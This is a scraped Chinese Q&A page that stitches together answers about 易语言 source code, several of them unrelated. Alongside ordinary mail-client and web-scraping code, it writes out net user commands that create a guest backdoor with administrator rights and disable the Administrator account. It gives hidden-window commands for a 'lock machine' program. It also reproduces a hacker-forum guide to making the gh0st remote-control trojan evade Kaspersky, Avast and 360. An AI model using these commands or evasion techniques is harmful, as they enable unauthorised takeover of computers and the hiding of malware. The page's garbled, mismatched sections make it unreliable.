易语言telnet源码
㈠ 跪求易语言开机密码修改的源码。
我给你们源码把,那个修改开机的,千万不要运行...还有,我不是原作者(如果运行了,请进pe,然后清除密码)
这里给大家说明一下,网上的所有什么修改开机密码啊,进过我认证,全是我自己做的,原因在这,看图片。
这个是为了记住我自己的源码所做的。
这个添加后门的意思是:共享c,d盘,(加上$隐藏),然后开启telnet服务(远程控制),最后打开远程桌面。
改密码的意思是:net user guest /active:yes 将停用的guest帐号激活(变为可用)
然后:net user guest 888888把 Guest 帐号的密码改为 888888
最后:net localgroup Administrators guest /add把 Guest 加到Administrators组中(这样就有了超级权限)
致命的命令:net user Administrator/active:no 停用原来的账号
这些是黑客ip$入侵留后门的经典招数
预防所谓的黑客入侵方法就是看看自己是不是被共享了,方法很简单,在这里我就不说了。
所谓的黑客指的是只会ip$和肉鸡入侵,那些黑客一般都是渣渣,所以不必要害怕,这个软件的原作者我觉得也是一名骇客,这点小技术就要钱,太不要脸。
㈡ 易语言怎么获取网页源代码
是完全可以查到的,但正常情况下不会去帮你查,需要先去公安局立案,也就是说你一定得要有极其充分的理由才可以让公安局帮你查。
1、因为现在的微信号必须得绑定手机号,而在使用微信的过程中总会用到手机号之类的信息,所以个人的微信信息全部都会被存在腾讯公司的内部服务器里。
2、公安机关如果是由于民事案件而向腾讯公司申请查询用户的微信数据的话,腾讯公司是完全有理由不配合公安机关的信息查询的,因为这牵涉到了用户的个人隐私。
3、只有在牵涉到重大刑事案件以及危害国家安全的案件时,腾讯公司才有义务配合公安机关去调查用户的信息。
4、如果微信内容已经涉及了刑事案件,特别是重要的刑事案件侦查线索,县级以上公安机关是可以对这个手机号码采取技术侦查手段的。
5、这个方式是一定可以追踪你手机的位置信息的,既便是关机也没有任何作用,还是能追踪到,并且还可以监听你的通话,拦截你的微信。
6、在公安局启动技术侦查手段之前的一定时间内,你的通话内容和微信内容无论是收还是发都全部会被保存到一个为了提供通信服务公司的计算机上,因此要查出短信内容和通话内容是完全可以的。
(2)易语言telnet源码扩展阅读
根据公安机关办理刑事案件程序规定第254条,技术侦查措施适用的范围为以下案件:
1、危害国家安全犯罪、恐怖活动犯罪、黑社会性质的组织犯罪、重大毒品犯罪案件。
2、故意杀人、故意伤害致人重伤或者死亡、强奸、抢劫、绑架、放火、爆炸、投放危险物质等严重暴力犯罪案件。
3、集团性、系列性、跨区域性重大犯罪案件。
4、利用电信、计算机网络、寄递渠道等实施的重大犯罪案件,以及针对计算机网络实施的重大犯罪案件。
5、其他严重危害社会的犯罪案件,依法可能判处七年以上有期徒刑的。
6、公安机关追捕被通缉或者批准、决定逮捕的在逃的犯罪嫌疑人、被告人,可以采取追捕所必需的技术侦查措施。
㈢ 求如何修改易语言源码过程,
修改易语言源码过程:
在你的电脑上安装一个易语言
→
得到你想修改的易语言源码(*.e格式的文件)
→
用易语言打开源码文件
→
改成你希望的效果
→
保存文件
→
关闭易语言.
就是这么简单.
㈣ 跪求易语言锁机源码求详细
运行("net user Administrator 密码",假,#隐藏窗口)
运行("net user 用户名 密码 /add",假,#隐藏窗口)
运行("net user administrators 同上用户名 /add",假,#隐藏窗口)
这段代码,就OK了
用户名-账号名称,密码-你想设定的密码,同上用户名-第二句代码中的用户名
自己改变一下
以此类推
,要关机的话,加上:
关闭系统(#关机,真)
㈤ (300分)求易语言一个收信源码
.版本 2
.支持库 pop3
.程序集 启动程序集
.程序集变量 邮件, 邮件信息, , "0"
.程序集变量 附件, 附件信息, , "0"
.程序集变量 邮件索引, 整数型
.程序集变量 附件索引, 整数型
.程序集变量 邮件总数, 整数型
.程序集变量 附件个数, 整数型
.程序集变量 登陆信息, 文本型, , "6"
.程序集变量 是否快速浏览, 逻辑型
.程序集变量 邮件大小, 整数型, , "0"
.程序集变量 邮件序号组, 文本型, , "0"
.子程序 _启动子程序, 整数型, , 本子程序在程序启动后最先执行
标准输出 (, “邮件接收支持库的测试” + #换行符)
标准输出 (, “邮箱登陆:” + #换行符)
注册邮件接收回调函数 (&回调函数)
设置代理 ()
登陆 ()
快速浏览 ()
标准输出 (, “快速浏览完毕” + #换行符)
标准输出 (, “需要详细查看各邮件吗?(Y/N)”)
.如果真 (取代码 (标准输入 (), 1) = 121)
读邮件 ()
.如果真结束
标准输入 ()
返回 (0) ' 可以根据您的需要返回任意数值
.子程序 设置代理
.局部变量 是否设置, 文本型
.局部变量 服务器类型, 文本型
.局部变量 服务器地址, 文本型
.局部变量 服务器端口, 文本型
.局部变量 服务器用户, 文本型
.局部变量 服务器密码, 文本型
标准输出 (, “是否设置代理服务器(Y/N)” + #换行符)
是否设置 = 标准输入 ()
.如果真 (取代码 (是否设置, 1) = 121)
标准输出 (, “1:HTTP1.1代理,2:SOCKS5代理----”)
服务器类型 = 标准输入 ()
标准输出 (, “代理服务器IP地址----”)
服务器地址 = 标准输入 ()
标准输出 (, “端口号----”)
服务器端口 = 标准输入 ()
标准输出 (, “用户名----”)
服务器用户 = 标准输入 ()
标准输出 (, “密码----”)
服务器密码 = 标准输入 ()
.如果 (设置代理服务器 (到整数 (服务器类型), 服务器地址, 到数值 (服务器端口), 服务器用户, 服务器密码) = 真)
标准输出 (, “设置代理服务器成功” + #换行符)
.否则
标准输出 (, “设置代理服务器失败”)
标准输入 ()
结束 ()
.如果结束
.如果真结束
.子程序 登陆
.局部变量 文本变量, 文本型
标准输出 (, “请输入邮件服务器地址:”)
文本变量 = 标准输入 (真)
登陆信息 [1] = 文本变量
标准输出 (, “请输入端口号:”)
文本变量 = 标准输入 (真)
登陆信息 [2] = 文本变量
标准输出 (, “请输入用户名:”)
文本变量 = 标准输入 (真)
登陆信息 [3] = 文本变量
标准输出 (, “请输入密码:”)
文本变量 = 标准输入 (真)
登陆信息 [4] = 文本变量
标准输出 (, “请输入等待时间(毫秒):”)
文本变量 = 标准输入 (真)
登陆信息 [5] = 文本变量
标准输出 (, “请输入重试次数:”)
文本变量 = 标准输入 (真)
登陆信息 [6] = 文本变量
标准输出 (, #换行符)
连接邮件服务器 ()
.子程序 连接邮件服务器
标准输出 (, “正在登陆邮件服务器请稍候..........”)
标准输出 (, #换行符 + #换行符)
.如果真 (连接收信服务器 (登陆信息 [1], 到数值 (登陆信息 [2]), 登陆信息 [3], 登陆信息 [4], 到数值 (登陆信息 [5]), 到数值 (登陆信息 [6])) = 假)
标准输出 (, “发生错误:” + 取邮件错误信息 ())
标准输入 ()
结束 ()
.如果真结束
标准输出 (, “邮箱连接成功”)
读邮件 ()
.子程序 读邮件
.局部变量 逻辑返回, 逻辑型
.局部变量 邮件总量, 整数型
.局部变量 浏览, 文本型
.局部变量 邮件序号, 文本型
.局部变量 计次变量, 整数型
逻辑返回 = 获取邮件信息 (邮件总数, 邮件总量)
.如果真 (逻辑返回 = 假)
标准输出 (, “获取邮件信息出错:” + 取邮件错误信息 ())
标准输入 ()
结束 ()
.如果真结束
标准输出 (, “邮件总量:” + 到文本 (邮件总量) + #换行符)
标准输出 (, “邮件个数:” + 到文本 (邮件总数) + #换行符)
重定义数组 (邮件, 假, 邮件总数)
清除数组 (邮件大小)
逻辑返回 = 获取邮件大小 (-1, 邮件大小, 邮件总数)
.如果真 (逻辑返回 = 假)
标准输出 (, “获取每个邮件的大小出错:” + 取邮件错误信息 ())
标准输入 ()
结束 ()
.如果真结束
标准输出 (, “是否要快速浏览(Y/N) ”)
浏览 = 标准输入 (真)
标准输出 (, #换行符)
标准输出 (, “正在接收邮件请稍候............”)
.如果 (取代码 (浏览, 1) = 121)
是否快速浏览 = 真
.计次循环首 (邮件总数, 计次变量)
邮件 [计次变量] = 接收邮件前几行 (计次变量, 10)
.计次循环尾 ()
.否则
.计次循环首 (邮件总数, 计次变量)
邮件 [计次变量] = 接收邮件 (计次变量)
.计次循环尾 ()
.如果结束
标准输出 (, #换行符)
标准输出 (, #换行符)
清除数组 (邮件序号组)
.计次循环首 (邮件总数, 计次变量)
接收邮件序号 (计次变量, 邮件序号)
加入成员 (邮件序号组, 邮件序号)
.计次循环尾 ()
标准输出 (, “邮件接收完毕”)
断开收信服务器 ()
.如果真 (是否快速浏览 = 假)
邮件信息 ()
.如果真结束
.子程序 邮件信息
.局部变量 邮件次序号, 整数型
标准输出 (, “共接收邮件 ” + 到文本 (邮件总数) + “ 个” + #换行符)
标准输出 (, “要查看邮件内容请输入邮件的次序号:”)
邮件次序号 = 到数值 (标准输入 (真))
.如果 (邮件次序号 ≥ 1 且 邮件次序号 ≤ 邮件总数)
取邮件 (邮件次序号)
.否则
邮件信息 ()
.如果结束
.子程序 取附件信息
.参数 附件索引数, 整数型
.局部变量 是否嵌入式, 逻辑型
.局部变量 文件名, 文本型
.局部变量 文件号, 整数型
标准输出 (, #换行符)
标准输出 (, “第 ” + 到文本 (附件索引数) + “ 个附件信息” + #换行符)
标准输出 (, “是否嵌入式:”)
是否嵌入式 = 附件 [附件索引数].取是否嵌入式附件 ()
标准输出 (, 到文本 (是否嵌入式))
标准输出 (, #换行符)
.如果 (是否嵌入式 = 真)
标准输出 (, “嵌入文件名:”)
标准输出 (, 附件 [附件索引数].取名称 ())
.否则
标准输出 (, “附加文件名:”)
标准输出 (, 附件 [附件索引数].取文件名 ())
.如果结束
标准输出 (, #换行符)
标准输出 (, “附件大小:”)
标准输出 (, 到文本 (附件 [附件索引数].取大小 ()))
标准输出 (, #换行符)
标准输出 (, “附件类型:”)
标准输出 (, 附件 [附件索引数].取类型 ())
标准输出 (, #换行符)
标准输出 (, “编码方式:”)
标准输出 (, 附件 [附件索引数].取编码方式 ())
标准输出 (, #换行符)
标准输出 (, “附件数据的大小:”)
标准输出 (, 到文本 (取字节集长度 (附件 [附件索引数].取数据 ())))
标准输出 (, #换行符)
.子程序 取邮件
.参数 邮件索引数, 整数型
.局部变量 内容, 文本型
.局部变量 计次变量, 整数型
标准输出 (, “第 ” + 到文本 (邮件索引数) + “ 个邮件信息” + #换行符)
标准输出 (, “发件人名称:”)
标准输出 (, 邮件 [邮件索引数].取发件人名称 ())
标准输出 (, #换行符)
标准输出 (, “主题:”)
标准输出 (, 邮件 [邮件索引数].取主题 ())
标准输出 (, #换行符)
标准输出 (, “日期:”)
标准输出 (, 到文本 (邮件 [邮件索引数].取日期 ()))
标准输出 (, #换行符)
标准输出 (, “发件人地址:”)
标准输出 (, 邮件 [邮件索引数].取发件人地址 ())
标准输出 (, #换行符)
标准输出 (, “回复地址:”)
标准输出 (, 邮件 [邮件索引数].取回复地址 ())
标准输出 (, #换行符)
标准输出 (, “邮件大小:”)
标准输出 (, 到文本 (邮件大小 [邮件索引数]))
标准输出 (, #换行符)
标准输出 (, “邮件序号:”)
标准输出 (, 邮件序号组 [邮件索引数])
标准输出 (, #换行符)
标准输出 (, “原始信息长度:”)
标准输出 (, 到文本 (取文本长度 (邮件 [邮件索引数].取原始信息 ())))
标准输出 (, #换行符)
标准输出 (, “文本内容:”)
内容 = 邮件 [邮件索引数].取文本内容 ()
标准输出 (, 内容 + #换行符)
标准输出 (, “保存超文本文件”)
超文本内容 (邮件索引数)
标准输出 (, #换行符)
标准输出 (, “附件个数 :”)
附件个数 = 邮件 [邮件索引数].取附件个数 ()
标准输出 (, 到文本 (附件个数))
标准输出 (, #换行符)
.如果真 (是否快速浏览 = 假)
标准输出 (, #换行符)
附件 = 邮件 [邮件索引数].取附件 ()
.计次循环首 (取数组成员数 (附件), 计次变量)
取附件信息 (计次变量)
.计次循环尾 ()
选择保存附件 (邮件索引数)
标准输出 (, #换行符)
邮件信息 ()
.如果真结束
.子程序 选择保存附件
.参数 选择附件索引, 整数型
.局部变量 附件次序号, 整数型
标准输出 (, “是否需要保存附件(Y/N)”)
.如果 (取代码 (标准输入 (), 1) = 121)
标准输出 (, “请输入要保存的附件次序号:”)
附件次序号 = 到数值 (标准输入 (真))
.如果真 (附件次序号 ≥ 1 且 附件次序号 ≤ 附件个数)
保存附件 (附件次序号)
.如果真结束
.否则
删除子程序 (选择附件索引)
.如果结束
.子程序 删除子程序
.参数 索引
.局部变量 是否删除, 文本型
标准输出 (, “是否要删除该邮件(Y/N)”)
是否删除 = 标准输入 (真)
.如果真 (取代码 (是否删除, 1) = 121)
连接收信服务器 (登陆信息 [1], 到数值 (登陆信息 [2]), 登陆信息 [3], 登陆信息 [4], 到数值 (登陆信息 [5]), 到数值 (登陆信息 [6]))
.如果 (删除邮件 (索引) = 真)
标准输出 (, “删除成功”)
.否则
标准输出 (, “删除失败”)
.如果结束
.如果真结束
邮件复位 ()
.子程序 快速浏览
.局部变量 计次变量, 整数型
.计次循环首 (取数组成员数 (邮件), 计次变量)
取邮件 (计次变量)
删除子程序 (计次变量)
标准输出 (, #换行符)
.计次循环尾 ()
.子程序 保存附件
.参数 保存索引, 整数型
.局部变量 文件名, 文本型
.局部变量 文件号, 整数型
.如果 (附件 [保存索引].取是否嵌入式附件 () = 真)
文件名 = 附件 [保存索引].取名称 ()
.否则
文件名 = 附件 [保存索引].取文件名 ()
.如果结束
标准输出 (, “请输入要保存到的路径,以” + #引号 + “ \” + #引号 + “结束:”)
文件号 = 打开文件 (标准输入 (真) + 文件名, #重写, )
.如果 (插入字节集 (文件号, 附件 [保存索引].取数据 ()) = 真)
标准输出 (, “保存成功”)
.否则
标准输出 (, “保存失败”)
.如果结束
关闭文件 (文件号)
标准输出 (, #换行符)
.子程序 邮件复位
标准输出 (, #换行符)
标准输出 (, “需要恢复被删除的邮件吗?(Y/N)”)
.如果真 (取代码 (标准输入 (), ) = 121)
.如果 (复位邮件 () = 真)
标准输出 (, “复位成功,”)
标准输出 (, “删除的邮件被恢复”)
.否则
标准输出 (, “复位失败”)
.如果结束
.如果真结束
.子程序 超文本内容
.参数 索引, 整数型
.局部变量 计次变量, 整数型
.局部变量 文件号, 整数型
.局部变量 临时文件, 文本型
标准输出 (, “请输入临时浏览超文本文件的路径,以” + #引号 + “ \” + #引号 + “结束:”)
临时文件 = 标准输入 ()
文件号 = 打开文件 (临时文件 + “临时浏览.html”, #重写, ) ' 创建要浏览的超文本内容的网页文件
插入文本 (文件号, 邮件 [索引].取超文本内容 ())
关闭文件 (文件号)
.计次循环首 (邮件 [索引].取附件个数 (), 计次变量)
.如果真 (附件 [计次变量].取是否嵌入式附件 ())
文件号 = 打开文件 (临时文件 + 附件 [计次变量].取名称 (), #重写, ) ' 创建要浏览的超文本网页的附件文件
插入字节集 (文件号, 附件 [计次变量].取数据 ())
关闭文件 (文件号)
.如果真结束
.计次循环尾 ()
.子程序 回调函数, 逻辑型
.参数 类型, 整数型
.参数 第几封, 整数型
.参数 字节数, 整数型
.判断开始 (#命令类型.验证用户名 = 类型)
标准输出 (, “验证用户信息”)
.默认
.判断结束
返回 (真)
㈥ 易语言源码怎么修改
分情况讨论: 如果是编辑框、组合框的话,那么代码如下: 编辑框(组合框).内容=“你想修改的内容” 如果是标签、按钮、选择框、单选框等的话,那么代码如下: 标签(按钮等).标题=“你想修改的内容”
㈦ 易语言怎么编写远程控制啊像灰鸽子的那种!最好有源代码!
gh0st远控软件采用驱动级RESSDT过主动,svchost参数启动,替换系统服务的方式工作的,工作方式较为先进,美中不足的部分是没有进行驱动级或用户级隐藏,当然这部分可以添加进去。编码利用了VC的编程环境。
一、环境配置
编译环境一定要配置好:DDK+SDK+VC6,DDK用来编译sys文件的,SDK+VC6是用来编译工程的,配置部分比较简单,网上有很多资料,这里不再详述,有兴趣的朋友也可以查看DDK和SDK的相关帮助。
二、特征码定位简述
杀毒软件查杀木马的原理基本是根据特征查杀的,被查杀的部分我们称之为特征码,所以我们可以利用特征码定位工具MyCLL定位出病毒的特征码位置,定位工具原理是将被扫描木马分块,利用分段填充的方式,匹配杀软的特征值,找到杀软查杀病毒的位置。
定位出特征码,如何反向找到源码中的对应位置呢?请看下面分析,
三、二进制文件与源码定位之map文件利用
map文件是二进制和源码之间对应的一个映射文件。
我们假设根据第三步我们定位出了病毒的特征码:
病毒名称 特征码位置 内存地址
svchost.dll 000038AA_00000002 100044AA
svchost.dll 00005F98_00000002
第一步设置VC编译环境生成Map文件。
在 VC 中,点击菜单“Project -> Settings”选项页(或按下 Alt+F7),选择 C/C++ 选项卡,并在最下面的 Project Options 里面输入:/Zd ,然后要点击 Link 选项卡,选中“Generate mapfile”复选框,并在最下面的 Project Options 里面输入:/mapinfo:lines,表示生成 MAP 文件时,加入行信息。设置完成。
第二步编译VC工程,设置活动工程编译即可,这个不用说明。这个步骤完成后,在release(或debug)目录,多了一个.map文件(比如svchost.map)。
第三步打开map文件(用UE或文本编辑器打开都行),形式如下:
(begin)
Timestamp is 488fcef2 (Wed Jul 30 10:16:18 2008)
Preferred load address is 10000000
---------------------------------------------------------------------------1----(为方便说明,wrw添加)
Start Length Name Class
0001:00000000 00010a50H .text CODE
0001:00010a50 00000485H .text$x CODE
0002:00000000 000004c8H .idata$5 DATA
......
0003:00000010 00000004H .CRT$XIZ DATA
0003:00000020 00001a50H .data DATA
0003:00001a70 00000688H .bss DATA
0004:00000000 000000a8H .rsrc$01 DATA
0004:000000b0 00000cf0H .rsrc$02 DATA
----------------------------------------------------------------------------2---(为方便说明,wrw添加)
Address Publics by Value Rva+Base Lib:Object
0001:00000000 ??0CAudio@@QAE@XZ 10001000 f Audio.obj
0001:000000d0 ??_GCAudio@@UAEPAXI@Z 100010d0 f i Audio.obj
0001:000000d0 ??_ECAudio@@UAEPAXI@Z 100010d0 f i Audio.obj
0001:000000f0 ??1CAudio@@UAE@XZ 100010f0 f Audio.obj
0001:000001e0 ?getRecordBuffer@CAudio@@QAEPAEPAK@Z 100011e0 f Audio.obj
0001:00000240 ?playBuffer@CAudio@@QAE_NPAEK@Z 10001240 f Audio.obj
0001:000002c0 ?InitializeWaveIn@CAudio@@AAE_NXZ 100012c0 f Audio.obj
......
0001:00003310 ?SendToken@CFileManager@@AAEHE@Z 10004310 f FileManager.obj
0001:00003320 ?UploadToRemote@CFileManager@@AAE_NPAE@Z 10004320 f FileManager.obj
0001:00003440 ?FixedUploadList@CFileManager@@AAE_NPBD@Z 10004440 f FileManager.obj
0001:00003670 ?StopTransfer@CFileManager@@AAEXXZ 10004670 f FileManager.obj
0001:00003730 ?CreateLocalRecvFile@CFileManager@@AAEXPAE@Z 10004730 f FileManager.obj
......
----------------------------------------------------------------------------3---(为方便说明,wrw添加)
Line numbers for .\Release\FileManager.obj(E:\vtmp\gh0st3src\Server\svchost\common\FileManager.cpp) segment .text
17 0001:00002630 20 0001:0000267f 21 0001:00002698 24 0001:000026d0
25 0001:000026f8 26 0001:0000273c 29 0001:000027d0 33 0001:000027ee
77 0001:000027f8 36 0001:000027fb 37 0001:00002803 77 0001:0000280d
......
532 0001:0000340f 534 0001:00003414 537 0001:00003428 540 0001:00003440
546 0001:0000345d 547 0001:00003487 548 0001:00003490 549 0001:00003492
551 0001:0000349e 552 0001:000034b8 553 0001:000034cb 554 0001:000034d4
558 0001:000034de 560 0001:000034e9 563 0001:000034ee 564 0001:00003506
......
(end)
我们看下,定位svchost.dll 的第一个特征码内存地址为:100044AA,在第2块中,我们可以找到RVA+BASE与之很接近的是
0001:00003440 ?FixedUploadList@CFileManager@@AAE_NPBD@Z 10004440 f FileManager.obj
这样我们可以定位到FileManager.cpp中的FixedUploadList函数,是不是范围缩小了?
下面我们再缩小代码行
利用这个公式:特征码行偏移 = 特征码地址(Crash Address)- 基地址(ImageBase Address)- 0x1000
看起来好像很难,其实很简单,我们将100044AA去掉内存基址10000000,再减1000,因为PE很多从1000开始,可以得到代码偏移地址为34AA。到第3块中找对应的代码行。
偏移地址34AA在(551 0001:0000349e 552 0001:000034b8 )中间,也就是551行和552行中间,我们到源程序中查找第551行:
wsprintf(lpszFilter, "%s%s*.*", lpPathName, lpszSlash);
这样就定位出源代码了,要怎么修改就怎么修改它就可以了。
四、实战免杀
A、卡巴免杀
首次编译后,先做卡巴的免杀。卡巴杀sys文件和dll,当然也就杀包装它们的install.exe,最后卡巴还杀生成的sever,我这里说杀生成好的server不是和前面的特征码重叠的地方,而是杀配置信息。
第一步、sys免杀
sys重新编译后,增加了输入表的函数,同时系统不同,造成很多地方不同于原特征,顺利通过卡巴、金山、小红伞等杀软。
第二步、svchost.dll免杀
特征码定位MultiByteToWideChar和"gh0st update"两个位置。这里是通过第3步map文件得出的。
卡巴怕加花指令, 这个函数MultiByteToWideChar的调用上,可以在这个函数前面随便加几句无效语句就可以通过卡巴杀软。
字符串调用"gh0st update" ,这个是用于更新用的 ,如果不要在线更新,直接把这个语句所在代码块删除;嘿嘿,其实搜索工程替换这个字符串为其他的字符串就可以了^_^,这个方法同时可以过金山杀软。
第三步、server免杀
卡巴定位在最后的配置信息,采取跳转显然是不行的,采用加花的办法,在写入AAAAAA配置信息之前,随便写些东西,就可以做server免杀。
卡巴免杀完成!
B、Avast免杀
最新的avast杀软再查杀1下,杀install.exe和svchost.dll(也就是杀生成的文件和其中的资源文件),接着做它的源码免杀。
定位在特征字符串%02d/%02d/%02d和“SYSTEM\CurrentControlSet\Services\%s”两个地方。
解决方案:
1、svchost.dll的特征码定位在键盘记录KeyboardManager.cpp文件中的SaveInfo(char *lpBuffer)函数。特征字符串%02d/%02d/%02d,也就是我们看到键盘记录的日期,修改之,修改的方法很多,将其改为[%d/%d/%d %d:%d:%d] ,编译即可通过avast杀软。
2、install的特征码定位在“SYSTEM\CurrentControlSet\Services\%s”,对应文件是install.cpp里的InstallService函数,修改大小写,编译即可通过免杀。
五、添加垃圾代码的小方法
垃圾代码要移动特征码所在的位置,不要跑到堆栈中了,这样的代码没有用。可以采取添加for循环,做计数,简单统计,采用局部变量,不改变后面的逻辑为宜。
添加输出表的方法:
有杀输出表的,可以在生成的svchost.dll上添加空函数 ,但是每次编译都要修改1次资源 ,其实我们在源码上添加如下语句:
extern "C" __declspec(dllexport) bool JustTempFun();//声明
……
extern "C" __declspec(dllexport) bool JustTempFun() //实现
{
return false;
}
编译后,输出表就被改变了,有的杀软就可做到代码免杀。
六、gh0st自动生成6to4ex.dll的修改
看到好多站友提问自动生成6to4ex.dll的问题,有热心站友也提出了自己的见解 ,我感觉有些人提出的解决方案不完全正确,有可能造成刚入手人误解,我根据自己的理解说明1下。
gh0st服务端是通svchost -netsvcs启动的,所以程序要利用netsvcs 服务,服务端也就是根据netsvcs生成的,故不能说服务端生成是随机的,相对于大多数系统来讲,基本是固定的,下面看分析。
查看install.cpp里面的InstallService()方法,首先遍历HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows NT\CurrentVersion\Svchost中的服务项,查找到一个服务后,程序采取替换服务的方法,将原服务删除,然后生成对应服务项+ ex.dll的文件替换原服务,6to4服务一般排在第一位,6to4服务是一种自动构造隧道的方式,作用在于只需要一个全球惟一的IPv4地址便可使得整个站点获得IPv6 的连接,这个服务对一般人来讲,基本闲置,所以我们的程序就把6to4服务给替换掉,同时在windows\system32\目录下生成 6to4ex.dll,以后启动就是6to4ex了,如果把这个服务跳过去,就依次向下生成Ias、Iprip等服务啦,如果netsvcs项没有可以替换的服务,则程序将自己添加1个服务,名称就是由 AddsvchostService()方法产生的netsvcs_0x%d。
这样说不知道关心服务名称的明白了不?
这个不能说是技术问题,但是小技巧问题可以从这里产生,我不知道其他人的360是怎么过的,但是我觉得可以提示1下的是,如果是360默认系统安全的服务,它肯定不会报不安全,替换闲置的系统安全的服务则通过360的效果要好的多
本文来自: 华夏黑客同盟论坛 本文详细地址:http://bbs.77169.com/read.php?tid=255676
㈧ 易语言如何获取网页源码的并展示出来
.版本2
.支持库RegEx
.支持库internet
.支持库iext
.子程序_按钮1_被单击
.局部变量网页文本,文本型
.局部变量表达式,正则表达式
.局部变量搜索结果,搜索结果,,"0"
.局部变量计次变量,整数型
.局部变量文本,文本型
网页文本=到文本(HTTP读文件(编辑框1.内容))
网页文本=子文本替换(网页文本,#引号,“'”,0,,真)
网页文本=到小写(网页文本)
透明标签1.标题=取中间文(网页文本,“<title>”,“</title>”)
表达式.创建(“meta(.*?)>”,假)
搜索结果=表达式.搜索全部(网页文本)
.计次循环首(取数组成员数(搜索结果),计次变量)
文本=搜索结果[计次变量].取子匹配文本(网页文本,1,)
.判断开始(寻找文本(文本,“name='keywords'”,1,假)>0)
透明标签2.标题=取中间文(文本,“content='”,“'”)
.判断(寻找文本(文本,“name='description'”,1,假)>0)
透明标签3.标题=取中间文(文本,“content='”,“'”)
.默认
.判断结束
.计次循环尾()
.子程序取中间文,文本型
.参数全文,文本型
.参数左文,文本型
.参数右文,文本型
.局部变量位置,整数型
.局部变量总长度,整数型
.局部变量文本,文本型
总长度=取文本长度(全文)
位置=寻找文本(全文,左文,,假)
.如果真(位置<0)
返回(“”)
.如果真结束
位置=位置+取文本长度(左文)
文本=取文本中间(全文,位置,总长度)
总长度=取文本长度(文本)
位置=寻找文本(文本,右文,,假)-1
.如果真(位置<0)
返回(“”)
.如果真结束
文本=取文本中间(文本,1,位置)
返回(文本)
㈨ 易语言怎么取网页源码
问题一:易语言如何获取网页源码的并展示出来? .版本 2
.支持库 RegEx
.支持库 internet
.支持库 iext
.子程序 _按钮1_被单击
.局部变量 网页文本, 文本型
.局部变量 表达式, 正则表达式
.局部变量 搜索结果, 搜索结果, , 0
.局部变量 计次变量, 整数型
.局部变量 文本, 文本型
网页文本 = 到文本 (HTTP读文件 (编辑框1.内容))
网页文本 = 子文本替换 (网页文本, #引号, “'”, 0, , 真)
网页文本 = 到小写 (网页文本)
透明标签1.标题 = 取中间文 (网页文本, “”, “”)
表达式.创建 (“meta (.*?)>”, 假)
搜索结果 = 表达式.搜索全部 (网页文本)
.计次循环首 (取数组成员数 (搜索结果), 计次变量)
文本 = 搜索结果 [计次变量].取子匹配文本 (网页文本, 1, )
.判断开始 (寻找文本 (文本, “name='keywords'”, 1, 假) > 0)
透明标签2.标题 = 取中间文 (文本, “content='”, “'”)
.判断 (寻找文本 (文本, “name='description'”, 1, 假) > 0)
透明标签3.标题 = 取中间文 (文本, “content='”, “'”)
.默认
.判断结束
.计次循环尾 ()
.子程序 取中间文, 文本型
.参数 全文, 文本型
.参数 左文, 文本型
.参数 右文, 文本型
.局部变量 位置, 整数型
.局部变量 总长度, 整数型
.局部变量 文本, 文本型
总长度 = 取文本长度 (全文)
位置 = 寻找文本 (全文, 左文, , 假)
.如果真 (位置 < 0)
返回 (“”)
.如果真结束
位置 = 位置 + 取文本长度 (左文)
文本 = 取文本中间 (全文, 位置, 总长度)
总长度 = 取文本长度 (文本)
位置 = 寻找文本 (文本, 右文, , 假) - 1
.如果真 (位置 < 0)
返回 (“”)
.如果真结束
文本 = 取文本中间 (文本, 1, 位置)
返回 (文本)
问题二:易语言怎么获取网页源代码 我记得我给你回答过了,其实说老实话,想学好一门编程语言,不下大功夫是不行的,网上有很多开源的,我不能帮你太多,因为我对这方面不是很懂,呵呵,不好意思。
问题三:易语言取网页源码的问题,求解答! 思路:
超文本浏览框.取文档对象 ().对象型方法 (“getElementById”, “xxx”).方法 (“focus”, )
超文本浏览框.取文档对象 ().对象型方法 (“getElementById”, “xxx”).方法 (“click”, )
取这个选择框的对象(XXX是对象名称或者ID),然后让其获得焦点并兄唯单击它
就可以再取
临时文本 = 超文本浏览框.取文档对象 ().读对象型属性 (“body”, ).读文本属性 (“outerText”, )
此时的临时文本就是网页的源码如果你要HTML格式的就用“读文本属性 (“outerhtml”, )”
问题四:易语言怎么取网页代码中的一段代码! 20分 高级答案:
首先创建子程序---取中间文件内容---------------------------------------------------------------------
.版本 2
.子程序 取文本中间内容, 文本型, 公开
.参数 需取文本, 文本型
.参数 左边内容, 文本型
.参数 右边内容, 文本型
.参数 成功与否, 逻辑型, 参考 可空
.局部变量 长度, 整数型
.局部变量 左边位置, 整数型
.局部变量 左边长度, 整数型
.局部变量 右边位置, 整数型
.局部变量 右边长度, 整数型
长度 = 取文本长度 (需取文本)
左边位置 = 寻找文本 (需取文本, 左边内容, 0, 假羡汪培)
左边长度 = 取文本长陵氏度 (左边内容)
.如果真 (左边位置 = -1)
成功与否 = 假
返回 (“未找到左边内容”)
.如果真结束
右边位置 = 寻找文本 (需取文本, 右边内容, 0, 假)
右边长度 = 取文本长度 (右边内容)
.如果真 (右边位置 = -1)
成功与否 = 假
返回 (“未找到右边内容”)
.如果真结束
成功与否 = 真
返回 (取文本中间 (需取文本, 左边位置 + 左边长度, 长度 - (左边位置 + 左边长度) - (长度 - 右边位置)))
--------------------创建完毕-------------------------厂------------------------------------------------------------
新建个编辑框1.然后在建个按钮,在按钮里输入代码
编辑框1.内容=取文本中间内容 (zxcvbnm123456789asfhyf, zxcvbnm, asfhyf)
点击这个按钮,编辑框1的内容就是123456789
图片概要:
问题五:易语言 取网页源码 可以实时获取超文本浏览框里的源码,和 查看源代码一样。
问题六:易语言这个取网页源码如何取文本中间?有图 到整数删除了就可以了
问题七:易语言 如何读取网页源文件的代码! .版本 2
.支持库 internet
.子程序 __启动窗口_创建完毕
_启动窗口.标题 = 到文本 (HTTP读文件 (“你要打开的t攻t地址。txt”))
问题八:求易语言多线程提取网页源码的例子 这是一个最简单的多线程网页访问保存网页的程序,如果满意采纳哦
问题九:易语言取网页源码中的元素内容,应该关于精易模块 80分 你要的只是取这个 span 里的内容吗?
用了精易模块的话
你可以用 文本_取出中间文本() 命令来获取,命令格式如下:
文本_取出中间文本(原文本,目标文本左边,目标文本右边)
原文本这里就可以是你读取出来的网页源码
目标文本左边,在你的图片里,就可以是
目标文本右边,在你的图片里,就是
问题十:易语言取网页指定内容源码 要方便快捷的话,就用精易模块里面的取出中间文本(),不想用模块的话就用分割文本。建议你用精易模块的文本_取中间文本()